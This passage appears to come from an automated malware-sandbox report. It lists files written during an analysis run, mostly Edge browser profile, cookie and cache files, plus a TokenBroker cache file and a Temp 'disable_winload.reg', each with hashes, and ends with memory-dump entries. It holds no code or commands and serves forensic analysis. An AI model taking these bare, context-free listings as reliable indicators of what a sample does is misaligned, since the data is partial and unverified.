SHA51233ac921f8805a9e1560cb105b6127a3997be01f7347f3215b4301669ab34d06952bda6a19bdb5e3ba75f2acdda4349968510f0afb7dd80a23239175915ac96e5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3Filesize
4.0MB
MD52c75c5015438644cfe7672b33e2a3ce7
SHA1bf195e6a40ffe7d856da91e6eb2e41528b8e5cc8
SHA25623bdf32b2b9c4f5fd0cd5ae8e817fd5c90feb8d6c2673e91ba2078325ceb94d4
SHA512b4fb044dc31dc1f2def09e8bd18377262116d1c10232191b16d2db349850924bd0e4833de9da59b9a0462303cbf944411e78c4907a6d35ec90bb8427801002c4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
336B
MD5df98d3f3982bda2173bac75bbac30205
SHA19885a14de7e3e6989139e6ebdbcbf6320649ddda
SHA256e85fbc7e40f23d12343f1e24a5c279781001263de3d8ed9d4ec3ae1fd429a18e
SHA5123bb659e9a9810d5c117989796f4b52e30071a0a8e7b33c5c4d791aa65139cd2ed479e8c5c3b1063e017b195c3422b72218bee6cd9794a5d560af185c44cc375e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.jsonFilesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOGFilesize
343B
MD5ffed1d2f72e55040f739d9274c998b7f
SHA10ccf24d00c1b4d316cc742313efd3c30b7444754
SHA25692035273cfe5ddada8a951f49ae5fb88db9888f170bc97f4fa89bac4ac675c6f
SHA512233331290451ee48262fb875dc7fc614541e7732914ee2a29e10cc236d7b7b4306ca5a8aad0ead67f90555f457edc82826e0cc0d932eb15df1e945012a96c309
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.dbFilesize
32KB
MD54bb9ac6e72faeca724642933fee1879b
SHA16a1e7ced5e5c772e883c85230369df56f654ded9
SHA25671f98af6eae3264b10e021f43416330636f550efa645a6a833d1b234d40427fd
SHA512bf9ec85288225c06e4898c066e0fc5629443b33d8d0807883685f201055c56906346f40b376e21b6a18b0e9f685ca2ca77807cf4b4d5eaf11e6fea01864a47bd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOGFilesize
322B
MD50e012c4b886bad8ba6a0210c32bba83e
SHA14f0e3c5546bf56e47b6999a24d01cce43d325fba
SHA256712d072fd64e7075e26ff3163be0ec4a396a038425c3ca7765001ed45851669f
SHA51276cf194575e48c91de575982b43aeff3f7abded83fbfab514ebf725d5df484983abb5989a07bbca8ac4cd764c0a37fa82fe19d923ec233d0919f5b5acf1c96e6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HistoryFilesize
192KB
MD52b93e34e25ce01f09087f183ebb860ed
SHA1245903d625b3948560e9a047dcc758289d354b87
SHA2564606adf75ac0f12aefb9b8102c804b57fdceb23c117d977ca55079efc3f39d9e
SHA512cf01fabe6df578d79dc49d8208ebf8195d95c635739ec7bf5a2bd1288b20ca569ce0bb6d785ebf4e342de09233ffab6337ae077391e273f3ec1958b7a549ff33
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOGFilesize
331B
MD56cbb20a82acf558bf6344b38eff1bd33
SHA1b790ae46dcc76fba6217065948b99c73a34ce137
SHA2563da7deca7109d32ae79a137e7c04b7e43296090d707536cc78af5fb3d3979c7f
SHA51267734cac0958cff9def23246b6d23eb650d61a51d280cbbd95a5323cc51d38713fd16e2b28c6541ea6e9ae4b3ad177dfaf3f37963e9e0d4d6565853527e21209
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesFilesize
20KB
MD5002245b7dac76fa90ede1b93bf3e658a
SHA12ef47f1e3ac34fcd9517b4d72b9ecaa011e4511e
SHA256f21525d5ba7d293b9ab70404045d01d91ce60d73204b0cd17ab5cb79157a6e68
SHA5124fb6649f9d5cc4910de3b35fcdf3d517d463de2bb157b90f7cea37b8404f1aa0206304734e50e31f3b34830e2bb5fc46ce35d9f986f0ca2aaf467e037cc06de1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5cc2b20523a0bfc585cf2af6c82d9543b
SHA1d7a6978111d869b7b5163e3873e3cbf6a5f7e07e
SHA256afe141c1172ede3e153a5bd508915bf853b535872ad7ca904eeaca8d00d8b224
SHA512eeed7a609a7cbe4c6f9f28f2d9d03317534977e18e4ff206abab2b6691ad2e9d639d38e734f030ea577d597a0ea8d4a06d9a12fab067392607643a0d8dd50a08
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NELFilesize
36KB
MD560f9bdaab11643606bf6b93c4a270ee3
SHA1945bc00c5a5a3cfa69c377be662bb917d5a345a0
SHA2565d39ba254f1e62e7d652b3ff4e96e11f96f312c4581eeaa2e1477be21a50a068
SHA5123e3de5e2bbeb17c3469ca03b36b77d6ee34abf1879db3a1c9264c25ed49f3f302428dc52943f75aa7bb5180b4292ce19e27d3317c8c88a309d7d6b6582e603ce
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch DictionariesFilesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurityFilesize
690B
MD53b0c3051b3a1424e1663115922ce0183
SHA107bf41317b8e08c4abb1a94dc70f6585da097069
SHA256e167d6dced70046a7d5be80723bfae4bdd8e80f4e85b73f22b83bfdeff79a6a0
SHA512fcdfa3884da75fe0cda675bc72d066c15fd58254bf774443640664288edc728ce35b4f94206cf4c47f647375c7b16bc078b060ffe6361cfab451e5ada3e3eb3a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_historyFilesize
20KB
MD5ba3206dd4440e098aced94571e461ab2
SHA103c76b02bed1a481438b6b253d0cea644c15069e
SHA25650a6153269d51521beebc4d3bf3971b0f2c86ef6d5922312a13e2bbfbe78c45c
SHA51254141469a55d77f154074aacf0455c41b9752a888f9e01868ed9e27253bd46048ead1ad2d394ba22c56f526f4c9706ce7c63070b61efb24ace613f6eb00be1c2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
11KB
MD5d4eed2c29bbbb49c9b05265793c7e15f
SHA1dcecb891f84dd45c4733fb6d83938f26f56fd280
SHA256d2a40aba0e9a3e71555fc12e1aa93851572027709bd014f53af55dce4f1dd4e6
SHA5125485767cb9ae8043f51d805ea7cd6a97f9c2de600a507672259ea85bcbc0dd9ffc440ccdc33bb73d244976ed1dd192aef61019f72f312ff19bb73788f551ee9c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
11KB
MD5d212b92787c28692b1be53b22188bb1f
SHA1eaacab81d81e714383fae1f7763cf68c1105b544
SHA256641bbb34bd0dc23ae2dcfd2f3ea657dc6413651fec0b764bf1eac3657b405cb2
SHA51282aceb299821e7358c59decd22a377af55a39a2d96e63cbee9f73cd9d9b0d743d1db0ba650988dc0164f641e84d33a6d293bb8c939ce93a2eda0b4776ef3046b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
12KB
MD5b80346bc27e819dd20d3ca7df0231e83
SHA1a6764f1596a60feed5ec00d7db66fabe965a11dc
SHA256b8ca1804c37db16a765d523eb547365fbcf8591a45c89d502934e7966f5bfa7c
SHA51231d7bfb08fdb6f6f86f33a872723e05212fa8cd18cdf680154c52d49531b760b029b506244043b1fbed885ddf3b4f6e97f98a4032c3fee971024d23c82141f86
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
30KB
MD518827693a4cbf5427d21c6d3ea98eca5
SHA19783a0b80ebc960b4ab078191b3ccd8c8363c7a7
SHA256c0e3d18057d5614389a5e8ce049e069f6e4831d92ff969eb8dc7a7e869a03247
SHA512ac5e7618e3a15a153214b0e01c70944c46b41ed547539b6026e9ebf36238f1e25ef1088a20146e20b6694e3bc5396d026b9d34fdcceef88c74f2864e0d91c350
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.logFilesize
256B
MD5d000f1fd6abd5db759be1f80d485e033
SHA11da5d9b9cc004238bae56a036655f1e7f13c1707
SHA256e38e68f43815af49ee8de4d263ae6870182df5b28543e9b3453c1a7bee8792c6
SHA512f245e1097d7b291aef6f4ec24f55b87e218f7ec9fb77e686eb694da6a3130fc9b89bb6f0dcbae0a09787a1673ba9eae68d83f0a6d2bfc7ae02ea9a74d9102933
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOGFilesize
347B
MD50393255e0297ad470513bbb56672cf89
SHA1e25d879409fed89b2c4cf9330fa67e91ef70f7ea
SHA256723c7a3d3e8e0482ff8c209315a5d0495ec575753edcaca4ffcecf30e5438452
SHA512dc02ff78efd8aa00c07c8185e2fc048c2aca657c101cc3c34c899859fdc650c2ee3af4a801995de4074da453e7b914b43cee148754393a28d7509fc5305c6810
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOGFilesize
326B
MD578306808acee50feda7f48f665107923
SHA1334b827d75a0241b38da4029b25dc79a885673fb
SHA25642b0a98cbed65a314e5b040d3b1c006e9ee538108d29ac8ac96109133051e9ad
SHA512f64d28fb90bba8d413fcaa38456a9dfb344eaba09b8c349acf2802be15f66c63737e5a7eaf669f585a6bd51bf22bd028346beb3366b125f52113abd1d13cfee6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited LinksFilesize
128KB
MD535a9a35c535e739d30b3bb469082608f
SHA1ab727ec572d3f30f198176814bcc40a704310d00
SHA256b235b85a1f2f76e7023242a47f0fa4b478aa645ffc7d06ab7910571f192d4f51
SHA512ab960f394bc7ca5e5e42bdcde14457fe50ad594371f27c118d24e6bf1ae26e9901c8afdfb7c6a6dcd39edc00017c0d68a8fe067cbe843e96b29d7d992f34718c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Vpn TokensFilesize
28KB
MD5599549ca7050fda41d48cd1d92212e59
SHA19e44dec26d7dbced9ca1214da493f613f9cb0150
SHA2568eb4364904924eac8f323797cec4569b52c109a32d2d848af8fe3e4fd87eacba
SHA512bd0da72d7582c887cd2e451841d8dcedf84b7d631220f696ad1b73611e88c77a6a974781b288a422c28cdf91fa74a2d5ca779403282f717a4a59de31b352e933
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web DataFilesize
220KB
MD53d9fc56a4b62bfe30bdca649e1d0dde0
SHA1a7b9e46e6893fb3c351d0d719f64593ea0fb2195
SHA256bd113567512812db5035c65ffea93b28bfa29e43d9167b620ff818929331e32f
SHA512ac4a2dcf41057fcf108f3383882ca10912e1f260dd7244540e834f5e981fad5d66b01e68c19719ded0cf814e8c187d51e95a07ebd056bb09e8a055d8660d3420
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\default_cloud_config.jsonFilesize
10KB
MD557568101acebec0d0b6da71cae750ffe
SHA1fef13f40e93641a18401b572d2004a0d88c4cabf
SHA256ed8dd56e4b9f5b0a5cd21bce41b3dc5a863e7960e0880dc454124ad84bdf5660
SHA5129a3422a013c8941d7c14ba079e7c871ed23884cefe9d5ccb498acc2503c4745c5cc8ed6588fdc3d51260f7c3bc14f1d47b9747e27def3d40b842f41b2436c796
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
Filesize
924B
MD5
30c8153ad37125ec8c78b2dde7601cf6
SHA1
00d24cb15edc63761f939d2a0287510d9a4f0d4b
SHA256
10a396a4754ba4b310534f211acf77ae380362e04e73cf5e806e77c15f773dfc
SHA512
6c840525232a1774032ec67897c89e8e12f2198e9a4b52a0aa2455d1cb227d46e77a70c77c30dadfcde3215588bf0a9f51af73be9050b22ad24b8d25fc99ebb2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
Filesize
322B
MD5
727a80b271decdb6176752703a858ec4
SHA1
f8780261299d12a5204a47f8caf4fc5139ab0145
SHA256
464c59c2c65de00dc6373e71762c742e58cfe3c73b794beb061a1c2defccde9c
SHA512
078e46a8fed4fcb6588b731b561504910b959b3c2286c2939580ad01c1333f12113c75dbd9b50a8ffa68fb0c883846944a17e05feaab29c828e74ac0c77fb8dc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
Filesize
922B
MD5
e8ef9bcbabb3e8c2fdfd8aba63ef8d16
SHA1
1b6c16fdc6a9dd03c84496fe65d00ff2bd83a667
SHA256
aebe35ec8f4a9a0072b29917566ef7e371f67c386bd668f57c26af9f467bbba9
SHA512
e77e44ad3eefd4a69bd1b3497a03b2625bb617c20cf2070462a9e6798a73d0fb5dba1cf2b09b336a5385fecd71d696fd4a8dbb56fb9b718db6281ed6580b76b7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
Filesize
340B
MD5
d572551f4976eba68f4db264cb9dbb38
SHA1
f6c34031cefa094c1d2f9cee2001949ddc50da24
SHA256
a8882a1219ed9c492b8b07c726172dc107fc5fb16bd9031c37e8578595e436d2
SHA512
e8cbba6c90c891bc8107b954657fd023cbe38773da07631a98deb601781fe7f492c3fa7f90c892c33d1ead4780e4a7e0f7a304c1b8eb5d714bc66afe4d820724
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0
Filesize
44KB
MD5
505d2e05de14af59a5681b60133e6855
SHA1
cfefed58ade44a9976d8c846953aa6a76fe29d53
SHA256
d54c6a67c94dd50fddaf87522510971321d8e86ba9390d62ba964be9499f3d04
SHA512
c1b6218c6bb8b3ce5a5638b7bd0b968e762aef576fd51b58f9e7a7d43d87cb348394971e9d10fa860ef0d8cdf8bf693bf54962d4df715374d46dd5234969d5fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1
Filesize
264KB
MD5
ca56d250ab9aff185e810895c3078b98
SHA1
71315e7e700b17a138be7f9194921335395c81a3
SHA256
c6491ed927c629e43c3fa1a042332623028e88b4da613b1fd786ba900ff55750
SHA512
c6a8b354f844688cfb109208816a5b850b487d860d26cc3fbcd9957fefd69fc22d45c74bacd65cc2666dc3da5d4e9706b61e56fcd134b5b72ce8f8b81cfa6047
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3
Filesize
4.0MB
MD5
ecbea603622eea6b809646a011a48f3e
SHA1
857f0e21bc07e3008f5daa0dd096e49d56120e23
SHA256
d8309f99e535a67b6b4a8ee81c0554f999162201b5137c3a8cf51cea365ae02b
SHA512
fb5451ad702acd7e78622e91368aeed844d42a4eb4af0bc3636dcbb557488492384f033c6a65d9ecc3dd7e487302898f7eda5463c0a802a3e264359b50aea4d3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1
Filesize
264KB
MD5
4b3902977900cb1ff9a74297e1b54bb0
SHA1
8945ef706dda2142403f65d4f6d5eda0f2e89514
SHA256
ca905283b4640dbc446ba00eedd28276bb821dd3ad2ee955bfe17207ce14039a
SHA512
b3bbf2c2d87ab520493b6b129e323c850a1fc95492d8bd4ee8b459ee63e433509e2f6885c615e023f3c1b239c72fd0d946a9d04c5d349aa8805ce1d67b8cdf87
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser
Filesize
120B
MD5
a397e5983d4a1619e36143b4d804b870
SHA1
aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4
SHA256
9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4
SHA512
4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
Filesize
13B
MD5
9f0786e66f4c80870bd874b7aba0a394
SHA1
74d461c9049086ea0301b956203e7cb59438160d
SHA256
da3e73d31020d249d320f01fc40220043e34ebc99fccaec56c5a97f671a8f227
SHA512
f766b4ee7c28886c1901cf76c1c917e296ddfd3cf843f4f27d7a73db37247ae0dfb8c3f343c4ba124d20f4475e0fb4cf60860215480341715bb907d73630cc6e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
72KB
MD5
e5134754542d0b53b12a88681715aa9c
SHA1
611ba737521d52888985dbc1d35b7d04a8495e74
SHA256
046fe2206d2d8c0538d223b83ddae0dfd9c14e23bb1b1bdf204760c10d93306a
SHA512
34be982aa73e860c6c8bf34201e543e4b8e02125a9520d264f13071cf30f6415cc915befd569c0480cafc913fd8b843fc2dfd01a66c05877b3cebe82fb177fd8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
75KB
MD5
195a0ed630d0cc9e2c73f15f78d3bd4e
SHA1
ce1a3db98c0f155de7f8df9b1f291abe99b5084e
SHA256
33ed5e0dfe68b5d508d7cba724001b73a640f4572c4fb0ab282364223b2fe6ac
SHA512
55332ceaf4e4c8486e43b2b92da37c52387a9915649c571f31f8980e46a7d4e0a01f11acdfca3b8f27a2eacf29bedcc7f6ac031945b99748207843887d81904b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
72KB
MD5
2329884ec278cb37ef322f66a79f8325
SHA1
64025aaaea99a5a4c9cf9657482752eccddf1c27
SHA256
1b318cbdff6dcdd4cb237b71f97f12ce21eb06688792763219996741e3d57f6a
SHA512
239f0cb64a7e67d2780b457f79624cdd8c948a55fc2ed7ea6e099a22d79e8600ff1f8cf1ca5268cc0772d4a49b7ec8c1cdd39f5fbe130ade1fc344ea7b8a5316
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
72KB
MD5
cbfe9f42607d03aebfb17ea5257ff187
SHA1
ac8c3344916d70c33cb9cedb631fb09c8ef4b9a0
SHA256
61bbeb0fc8ea23f18da3c08af8920d2b163eab8d47797a32bff51a4e674d7364
SHA512
25d49b1a1271b8c13478de075f3d50134f2a66cf9aef397fab75c39826c0b7d846fa003751ab0158496b16e4f3bfffef473f302284399694697af42b46300a45
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
Filesize
264KB
MD5
cdbdf0434142759c7fd2fac6681ad383
SHA1
e696eb8f00cefece40bb26b5d1c6c2066c6bcd0b
SHA256
7c5904196116943ff5937746461f94efe21cb469332d53dfaf7bdc76f1605d0d
SHA512
d951adbb416900f515402dbdabd3ecc6be6e10110787ae82a023c30b1166eda429c36bf6f0cbb2403ed2d79f5558950d6214b59f011abd7cb17ed1c135cc728b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
Filesize
86B
MD5
961e3604f228b0d10541ebf921500c86
SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize
2KB
MD5
0a54b44961bad08a9ced9770ad64a66f
SHA1
c89479167f3fe4c58543a7cfc05487cf5ecac8af
SHA256
ac09c78f31c57e704be7fbcd2cbe3965555782fffb5431031602427529b3fbbe
SHA512
6d7cb66ff8d2c46d89d06088fdd87322ed3554c55637aa0b6cc6c7f54f5c634b7b10452da3fd0568a86fad2707d49b85f71a2a8d8a15997cf5ab83d80d104b24
-
C:\Users\Admin\AppData\Local\Temp\cv_debug.log
Filesize
1KB
MD5
ca7b47c9dcd754a3106a9bd8403bf25b
SHA1
42f5bec4525a59758296bef04c5f7886be989efc
SHA256
051407ad4574d264278a3b6c14b5ad870ef7eb0d49141c9b4919b24a0acd94f4
SHA512
34d59bc0860a24a1f4507976ca12cc40da42c32824a161cc23ac8ab7bbb76959a0bf2307d390401ebf26fb2e04b181075b07036777191a6655cdf17cba807a72
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B
MD5
47b5ae368c4aff20eafa90ffdcd03a34
SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
24B
MD5
60476a101249aedff09a43e047040191
SHA1
de5b6a0adc7de7180e19286cf0f13567278cdb64
SHA256
35bc77a06bfdde8c8f3a474c88520262b88c7b8992ee6b2d5cf41dddc77a83fb
SHA512
f1d2dcc562a36434c6c6405ec4eac7ecfa76fc5a940114da6f94495b77584a132d5d82ad3556df749490be096cfd238fa8b484b7c734cbc4d074e963e5d451f4
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB
MD5
5a7e020ba68fa1d472a9720366c289ac
SHA1
efbc5340b726dbe321f676118fc6f2edd12159e8
SHA256
a45a63cc7d8ee3e6b28ca7fa71539f0968aafefb97b3b1a2c1554595d48eca1e
SHA512
2a0d35f7263faea87bb34ff4c30218b49bc6dd0e8d41e72323325406afb60543d31e6be4c2b874a9251e486c6c98e14d6826053ada8bcacfe46b26d0487592f1
-
\??\pipe\crashpad_3276_FOEWMXKZWVFTZLJK
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2168-10-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-11-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-12-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-9-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-0-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-8-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-7-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-6-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-2-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/2168-1-0x000001642DFD0000-0x000001642DFD1000-memory.dmp
Filesize
4KB
-
memory/3604-382-0x00007FF72FB80000-0x00007FF72FC13000-memory.dmp
Filesize
588KB